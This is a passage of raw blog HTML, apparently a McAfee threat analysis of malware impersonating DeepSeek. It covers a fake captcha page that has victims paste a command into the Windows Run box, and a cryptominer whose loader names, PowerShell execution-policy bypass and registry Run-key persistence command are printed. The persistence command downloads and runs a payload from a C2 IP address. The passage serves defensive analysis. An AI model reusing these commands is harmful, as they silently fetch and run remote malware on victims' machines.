768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-13-at-6.50.14-PM-205x115.png 205w\" sizes=\"auto, (max-width: 1408px) 100vw, 1408px\" \/><\/p>\n<p style=\"text-align: center;\"><em><strong><span class=\"TextRun MacChromeBold SCXW33826763 BCX0\" lang=\"EN-US\" xml:lang=\"EN-US\" data-contrast=\"auto\"><span class=\"NormalTextRun SCXW33826763 BCX0\">Figure<\/span><span class=\"NormalTextRun SCXW33826763 BCX0\">6<\/span><span class=\"NormalTextRun SCXW33826763 BCX0\">:<\/span><span class=\"NormalTextRun SCXW33826763 BCX0\"> Fake Captcha Page<\/span><\/span><span class=\"EOP SCXW33826763 BCX0\" data-ccp-props=\"{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335551550&quot;:2,&quot;335551620&quot;:2}\">\u00a0<\/span><\/strong><\/em><\/p>\n<p><span class=\"TextRun SCXW5665815 BCX0\" lang=\"EN-US\" xml:lang=\"EN-US\" data-contrast=\"auto\"><span class=\"NormalTextRun SCXW5665815 BCX0\">In this instance, the website <\/span><span class=\"NormalTextRun SpellingErrorV2Themed SCXW5665815 BCX0\">deepseekcaptcha<\/span><span class=\"NormalTextRun SCXW5665815 BCX0\">[.]top pretends to offer a partnership program for content creators. <\/span><span class=\"NormalTextRun SCXW5665815 BCX0\">They are <\/span><span class=\"NormalTextRun SCXW5665815 BCX0\">utilizing<\/span> <span class=\"NormalTextRun SCXW5665815 BCX0\">the<\/span><span class=\"NormalTextRun SCXW5665815 BCX0\"> technique called \u2018Brand Impersonation<\/span><span class=\"NormalTextRun SCXW5665815 BCX0\">\u2019,<\/span><span class=\"NormalTextRun SCXW5665815 BCX0\"> where <\/span><span class=\"NormalTextRun SCXW5665815 BCX0\">they\u2019re<\/span> <span class=\"NormalTextRun SCXW5665815 BCX0\">us<\/span><span class=\"NormalTextRun SCXW5665815 BCX0\">ing <\/span><span class=\"NormalTextRun SCXW5665815 BCX0\">DeepSeek\u2019s<\/span> <span class=\"NormalTextRun SCXW5665815 BCX0\">Icons and color scheme to appear as the <\/span><span class=\"NormalTextRun SCXW5665815 BCX0\">original <\/span><span class=\"NormalTextRun SCXW5665815 BCX0\">website.<\/span><\/span><span class=\"EOP SCXW5665815 BCX0\" data-ccp-props=\"{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559739&quot;:240}\">\u00a0<\/span><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-210706\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-13-at-6.52.20-PM.png\" alt=\"\" width=\"1800\" height=\"858\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-13-at-6.52.20-PM.png 1800w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-13-at-6.52.20-PM-300x143.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-13-at-6.52.20-PM-1024x488.png 1024w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-13-at-6.52.20-PM-768x366.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-13-at-6.52.20-PM-1536x732.png 1536w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-13-at-6.52.20-PM-205x98.png 205w\" sizes=\"auto, (max-width: 1800px) 100vw, 1800px\" \/><\/p>\n<p style=\"text-align: center;\"><em><strong><span class=\"NormalTextRun SCXW183942435 BCX0\">Figure <\/span><span class=\"NormalTextRun SCXW183942435 BCX0\">7<\/span><span class=\"NormalTextRun SCXW183942435 BCX0\">: <\/span><span class=\"NormalTextRun SpellingErrorV2Themed SCXW183942435 BCX0\">deepseekcaptcha<\/span><span class=\"NormalTextRun SCXW183942435 BCX0\">[.]top<\/span><\/strong><\/em><\/p>\n<p><span class=\"TextRun SCXW53749430 BCX0\" lang=\"EN-US\" xml:lang=\"EN-US\" data-contrast=\"auto\"><span class=\"NormalTextRun SCXW53749430 BCX0\">Once the user registers for the program, <\/span><span class=\"NormalTextRun SCXW53749430 BCX0\">they\u2019re<\/span><span class=\"NormalTextRun SCXW53749430 BCX0\"> redirected to the fake captcha page.<\/span><\/span><span class=\"EOP SCXW53749430 BCX0\" data-ccp-props=\"{&quot;335559739&quot;:0}\">\u00a0<\/span><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-210049\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.31.54-PM.png\" alt=\"\" width=\"1540\" height=\"674\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.31.54-PM.png 1540w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.31.54-PM-300x131.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.31.54-PM-1024x448.png 1024w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.31.54-PM-768x336.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.31.54-PM-1536x672.png 1536w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.31.54-PM-205x90.png 205w\" sizes=\"auto, (max-width: 1540px) 100vw, 1540px\" \/><\/p>\n<p style=\"text-align: center;\"><em><strong><span class=\"TextRun MacChromeBold SCXW240051701 BCX0\" lang=\"EN-US\" xml:lang=\"EN-US\" data-contrast=\"auto\"><span class=\"NormalTextRun SCXW240051701 BCX0\">Figure <\/span><span class=\"NormalTextRun SCXW240051701 BCX0\">8<\/span><span class=\"NormalTextRun SCXW240051701 BCX0\">: Fake Captcha Page hosted on the website<\/span><\/span><span class=\"EOP SCXW240051701 BCX0\" data-ccp-props=\"{&quot;335551550&quot;:2,&quot;335551620&quot;:2,&quot;335559739&quot;:0}\">\u00a0<\/span><\/strong><\/em><\/p>\n<p><span data-contrast=\"auto\">Here, as shown above, to authenticate, the user is asked to open the verification window by pressing the Windows + R key and then pressing CTRL + V to verify their identity.\u00a0<\/span><span data-ccp-props=\"{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559739&quot;:0}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">The user would observe a screen as shown in figure 9.\u00a0<\/span><span data-ccp-props=\"{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559739&quot;:0}\">\u00a0<\/span><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-210064\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.35.21-PM.png\" alt=\"\" width=\"960\" height=\"500\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.35.21-PM.png 960w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.35.21-PM-300x156.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.35.21-PM-768x400.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.35.21-PM-205x107.png 205w\" sizes=\"auto, (max-width: 960px) 100vw, 960px\" \/><\/p>\n<p style=\"text-align: center;\"><em><strong><span class=\"TextRun MacChromeBold SCXW58316558 BCX0\" lang=\"EN-US\" xml:lang=\"EN-US\" data-contrast=\"auto\"><span class=\"NormalTextRun SCXW58316558 BCX0\">Figure <\/span><span class=\"NormalTextRun SCXW58316558 BCX0\">9<\/span><span class=\"NormalTextRun SCXW58316558 BCX0\">: Windows Run panel after copying the CMD<\/span><\/span><span class=\"EOP SCXW58316558 BCX0\" data-ccp-props=\"{&quot;335551550&quot;:2,&quot;335551620&quot;:2,&quot;335559739&quot;:0}\">\u00a0<\/span><\/strong><\/em><\/p>\n<p><span data-contrast=\"auto\">On clicking \u2018OK\u2019, malware will be installed that can steal browser and financial information from the system.<\/span><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;134245529&quot;:true}\">\u00a0<\/span><\/p>\n<p><a href=\"https:\/\/www.mcafee.com\/en-us\/safe-browser\/mcafee-webadvisor.html\"><span data-contrast=\"none\">McAfee\u2019s Web Advisor<\/span><\/a><span data-contrast=\"auto\"> protects against such threats. In this instance, the fake captcha page was blocked and marked as suspicious before it could be accessed. Even if you aren\u2019t a McAfee customer, check out browser plugin for free.\u00a0<\/span><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;134245529&quot;:true}\">\u00a0<\/span><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-210109\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.38.21-PM.png\" alt=\"\" width=\"1376\" height=\"740\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.38.21-PM.png 1376w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.38.21-PM-300x161.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.38.21-PM-1024x551.png 1024w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.38.21-PM-768x413.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.38.21-PM-205x110.png 205w\" sizes=\"auto, (max-width: 1376px) 100vw, 1376px\" \/><\/p>\n<p style=\"text-align: center;\"><em><strong><span class=\"TextRun MacChromeBold SCXW26711753 BCX0\" lang=\"EN-US\" xml:lang=\"EN-US\" data-contrast=\"auto\"><span class=\"NormalTextRun SCXW26711753 BCX0\">Figure <\/span><span class=\"NormalTextRun SCXW26711753 BCX0\">10<\/span><span class=\"NormalTextRun SCXW26711753 BCX0\">: McAfee blocking malicious URL<\/span><\/span><span class=\"EOP SCXW26711753 BCX0\" data-ccp-props=\"{&quot;335551550&quot;:2,&quot;335551620&quot;:2,&quot;335559739&quot;:0}\">\u00a0<\/span><\/strong><\/em><\/p>\n<p>&nbsp;<\/p>\n<h3><span class=\"TextRun SCXW237261729 BCX0\" lang=\"EN-US\" xml:lang=\"EN-US\" data-contrast=\"none\"><span class=\"NormalTextRun SCXW237261729 BCX0\" data-ccp-parastyle=\"heading 3\">Example <\/span><span class=\"NormalTextRun SCXW237261729 BCX0\" data-ccp-parastyle=\"heading 3\">3<\/span><span class=\"NormalTextRun SCXW237261729 BCX0\" data-ccp-parastyle=\"heading 3\">: <\/span><span class=\"NormalTextRun SCXW237261729 BCX0\" data-ccp-parastyle=\"heading 3\">Technical Analysis <\/span><span class=\"NormalTextRun SCXW237261729 BCX0\" data-ccp-parastyle=\"heading 3\">o<\/span><span class=\"NormalTextRun SCXW237261729 BCX0\" data-ccp-parastyle=\"heading 3\">f <\/span><span class=\"NormalTextRun SCXW237261729 BCX0\" data-ccp-parastyle=\"heading 3\">a <\/span><span class=\"NormalTextRun SCXW237261729 BCX0\" data-ccp-parastyle=\"heading 3\">Crypto Miner<\/span><\/span><span class=\"EOP SCXW237261729 BCX0\" data-ccp-props=\"{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335559738&quot;:160,&quot;335559739&quot;:80}\">\u00a0<\/span><\/h3>\n<p><span data-contrast=\"auto\">In this section we talk about a <strong>*<\/strong><\/span><strong>Cryptominer<\/strong><span data-contrast=\"auto\"> malware that was masquerading as DeepSeek. By blocking this initial payload, we prevent a chain of events (Fig 11.) on the computer that would have led to reduced performance on the device and potentially expose your device to further infection attempts.<\/span><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;134245529&quot;:true}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">Some examples names used by the initial loader are were:<\/span><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;134245529&quot;:true}\">\u00a0<\/span><\/p>\n<ul>\n<li data-leveltext=\"\uf0b7\" data-font=\"Symbol\" data-listid=\"5\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559685&quot;:720,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Symbol&quot;,&quot;469769242&quot;:[8226],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;\uf0b7&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" aria-setsize=\"-1\" data-aria-posinset=\"1\" data-aria-level=\"1\"><span data-contrast=\"auto\">DeepSeek-VL2.Developer.Edition.exe<\/span><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;134245529&quot;:true}\">\u00a0<\/span><\/li>\n<\/ul>\n<ul>\n<li data-leveltext=\"\uf0b7\" data-font=\"Symbol\" data-listid=\"5\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559685&quot;:720,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Symbol&quot;,&quot;469769242&quot;:[8226],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;\uf0b7&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" aria-setsize=\"-1\" data-aria-posinset=\"2\" data-aria-level=\"1\"><span data-contrast=\"auto\">DeepSeek-R1.Leaked.Version.exe<\/span><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;134245529&quot;:true}\">\u00a0<\/span><\/li>\n<\/ul>\n<ul>\n<li data-leveltext=\"\uf0b7\" data-font=\"Symbol\" data-listid=\"5\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559685&quot;:720,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Symbol&quot;,&quot;469769242&quot;:[8226],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;\uf0b7&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" aria-setsize=\"-1\" data-aria-posinset=\"3\" data-aria-level=\"1\"><span data-contrast=\"auto\">DeepSeek-VL2.ISO.exe<\/span><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;134245529&quot;:true}\">\u00a0<\/span><\/li>\n<\/ul>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-210721\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-13-at-7.12.26-PM.png\" alt=\"\" width=\"1820\" height=\"926\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-13-at-7.12.26-PM.png 1820w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-13-at-7.12.26-PM-300x153.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-13-at-7.12.26-PM-1024x521.png 1024w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-13-at-7.12.26-PM-768x391.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-13-at-7.12.26-PM-1536x782.png 1536w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-13-at-7.12.26-PM-205x104.png 205w\" sizes=\"auto, (max-width: 1820px) 100vw, 1820px\" \/><\/p>\n<p style=\"text-align: center;\"><em><strong><span class=\"NormalTextRun SCXW157194579 BCX0\">Figure <\/span><span class=\"NormalTextRun SCXW157194579 BCX0\">1<\/span><span class=\"NormalTextRun SCXW157194579 BCX0\">1<\/span><span class=\"NormalTextRun SCXW157194579 BCX0\">: <\/span><span class=\"NormalTextRun SpellingErrorV2Themed SCXW157194579 BCX0\">CryptoMiner<\/span> <span class=\"NormalTextRun SpellingErrorV2Themed SCXW157194579 BCX0\">KillChain<\/span><\/strong><\/em><\/p>\n<h3 aria-level=\"5\"><span data-contrast=\"none\">Initial Execution<\/span><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335559738&quot;:80,&quot;335559739&quot;:40}\">\u00a0<\/span><\/h3>\n<p><span data-contrast=\"auto\">Once installed, this malware communicates with its <strong>*<\/strong><\/span><strong>C&amp;C<\/strong><span data-contrast=\"auto\"><strong> (<\/strong>Command and Control) to download and execute a <strong>*<\/strong><\/span><strong>PowerShell<\/strong><span data-contrast=\"auto\"> script. Figure 12 (a) and (b) show the malware connecting it&#8217;s IP address to download chunks of a script file which is then stored to the AppData\\Roaming folder as <\/span><i><span data-contrast=\"auto\">installer.ps1\u00a0<\/span><\/i><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335559685&quot;:720}\">\u00a0<\/span><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-209839\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.20.21-PM.png\" alt=\"\" width=\"1496\" height=\"224\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.20.21-PM.png 1496w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.20.21-PM-300x45.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.20.21-PM-1024x153.png 1024w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.20.21-PM-768x115.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.20.21-PM-205x31.png 205w\" sizes=\"auto, (max-width: 1496px) 100vw, 1496px\" \/><\/p>\n<p style=\"text-align: center;\"><em><strong><span class=\"TextRun MacChromeBold SCXW225999717 BCX0\" lang=\"EN-US\" xml:lang=\"EN-US\" data-contrast=\"auto\"><span class=\"NormalTextRun SCXW225999717 BCX0\">Figure <\/span><span class=\"NormalTextRun SCXW225999717 BCX0\">1<\/span><span class=\"NormalTextRun SCXW225999717 BCX0\">2<\/span><span class=\"NormalTextRun SCXW225999717 BCX0\">(a)<\/span><span class=\"NormalTextRun SCXW225999717 BCX0\">: Sample connects to <\/span><span class=\"NormalTextRun SCXW225999717 BCX0\">C&amp;C <\/span><span class=\"NormalTextRun SCXW225999717 BCX0\">IP Address<\/span><\/span><span class=\"EOP SCXW225999717 BCX0\" data-ccp-props=\"{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335551550&quot;:2,&quot;335551620&quot;:2}\">\u00a0<\/span><\/strong><\/em><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-209854\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.21.00-PM.png\" alt=\"\" width=\"1892\" height=\"510\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.21.00-PM.png 1892w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.21.00-PM-300x81.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.21.00-PM-1024x276.png 1024w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.21.00-PM-768x207.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.21.00-PM-1536x414.png 1536w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.21.00-PM-205x55.png 205w\" sizes=\"auto, (max-width: 1892px) 100vw, 1892px\" \/><\/p>\n<p style=\"text-align: center;\"><em><strong><span class=\"NormalTextRun SCXW196867112 BCX0\">Figure <\/span><span class=\"NormalTextRun SCXW196867112 BCX0\">1<\/span><span class=\"NormalTextRun SCXW196867112 BCX0\">2<\/span><span class=\"NormalTextRun SCXW196867112 BCX0\">(b)<\/span><span class=\"NormalTextRun SCXW196867112 BCX0\">: Installer.ps1 stored in Roaming folder<\/span><\/strong><\/em><\/p>\n<h3 aria-level=\"5\"><span data-contrast=\"none\">Injection\u00a0<\/span><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335559738&quot;:80,&quot;335559739&quot;:40}\">\u00a0<\/span><\/h3>\n<p><span data-contrast=\"auto\">An attempt is made to bypass system policies and launch the script<\/span><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335559685&quot;:720}\">\u00a0<\/span><\/p>\n<ul>\n<li data-leveltext=\"\uf0b7\" data-font=\"Symbol\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Symbol&quot;,&quot;469769242&quot;:[8226],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;\uf0b7&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" aria-setsize=\"-1\" data-aria-posinset=\"1\" data-aria-level=\"1\"><i><span data-contrast=\"auto\">\/c powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -File &#8220;C:\\Users\\admin\\AppData\\Roaming\\installer.ps1<\/span><\/i><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;134245529&quot;:true}\">\u00a0<\/span><\/li>\n<\/ul>\n<ul>\n<li data-leveltext=\"\uf0b7\" data-font=\"Symbol\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Symbol&quot;,&quot;469769242&quot;:[8226],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;\uf0b7&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" aria-setsize=\"-1\" data-aria-posinset=\"2\" data-aria-level=\"1\"><span data-contrast=\"auto\">The \u2018installer.ps1\u2019 contains malicious code which will be injected and executed using a technique called <strong>*<\/strong><\/span><strong>Process Injection<\/strong><span data-contrast=\"auto\">\u00a0 (Figure 14)<\/span><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;134245529&quot;:true}\">\u00a0<\/span><\/li>\n<\/ul>\n<ul>\n<li data-leveltext=\"\uf0b7\" data-font=\"Symbol\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Symbol&quot;,&quot;469769242&quot;:[8226],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;\uf0b7&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" aria-setsize=\"-1\" data-aria-posinset=\"3\" data-aria-level=\"1\"><span data-contrast=\"auto\">Figure 13 shows how the malware encodes this script to avoid detection<\/span><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;134245529&quot;:true}\">\u00a0<\/span><\/li>\n<\/ul>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-209869\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.21.30-PM.png\" alt=\"\" width=\"1000\" height=\"441\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.21.30-PM.png 1000w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.21.30-PM-300x132.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.21.30-PM-768x339.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.21.30-PM-205x90.png 205w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/p>\n<p style=\"text-align: center;\"><em><strong><span class=\"NormalTextRun SCXW85956038 BCX0\">Figure <\/span><span class=\"NormalTextRun SCXW85956038 BCX0\">1<\/span><span class=\"NormalTextRun SCXW85956038 BCX0\">3<\/span><span class=\"NormalTextRun SCXW85956038 BCX0\">: Base64 Encoded <\/span><span class=\"NormalTextRun SCXW85956038 BCX0\">Malicious Code<\/span><\/strong><\/em><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-209899\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.22.58-PM.png\" alt=\"\" width=\"1520\" height=\"948\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.22.58-PM.png 1520w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.22.58-PM-300x187.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.22.58-PM-1024x639.png 1024w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.22.58-PM-768x479.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.22.58-PM-205x129.png 205w\" sizes=\"auto, (max-width: 1520px) 100vw, 1520px\" \/><\/p>\n<p style=\"text-align: center;\"><em><strong><span class=\"NormalTextRun SCXW20049359 BCX0\">Figure <\/span><span class=\"NormalTextRun SCXW20049359 BCX0\">1<\/span><span class=\"NormalTextRun SCXW20049359 BCX0\">4<\/span><span class=\"NormalTextRun SCXW20049359 BCX0\">: PowerShell code for Process Injection.<\/span><\/strong><\/em><\/p>\n<h3 aria-level=\"5\"><strong>*Persistence \u00a0<\/strong><\/h3>\n<p><span data-contrast=\"auto\">Malware attempts to maintain <\/span><span data-contrast=\"none\">persistence<\/span><span data-contrast=\"auto\"> on the Victim\u2019s computer.\u00a0<\/span><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335559685&quot;:720}\">\u00a0<\/span><\/p>\n<ul>\n<li data-leveltext=\"\uf0b7\" data-font=\"Symbol\" data-listid=\"8\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Symbol&quot;,&quot;469769242&quot;:[8226],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;\uf0b7&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" aria-setsize=\"-1\" data-aria-posinset=\"1\" data-aria-level=\"1\"><span data-contrast=\"auto\">It executes reg.exe with the following command line (Fig 15)<\/span><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;134245529&quot;:true}\">\u00a0<\/span><\/li>\n<\/ul>\n<ul>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"8\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559685&quot;:1800,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" aria-setsize=\"-1\" data-aria-posinset=\"1\" data-aria-level=\"2\"><span data-contrast=\"auto\">reg add &#8220;HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run&#8221; \/v WindowsUpdate \/t REG_SZ \/d &#8220;powershell -ExecutionPolicy Bypass -NoProfile -Command Invoke-WebRequest -Uri 45[.]144[.]212[.]77:16000\/client -OutFile C:\\Users\\admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\runps.exe; Start-Process C:\\Users\\admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\runps.exe&#8221; \/f<\/span><span data-ccp-props=\"{}\">\u00a0<\/span><\/li>\n<\/ul>\n<p><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;134245529&quot;:true}\">\u00a0<\/span><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-209929\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.24.25-PM.png\" alt=\"\" width=\"1498\" height=\"248\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.24.25-PM.png 1498w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.24.25-PM-300x50.png 300w, 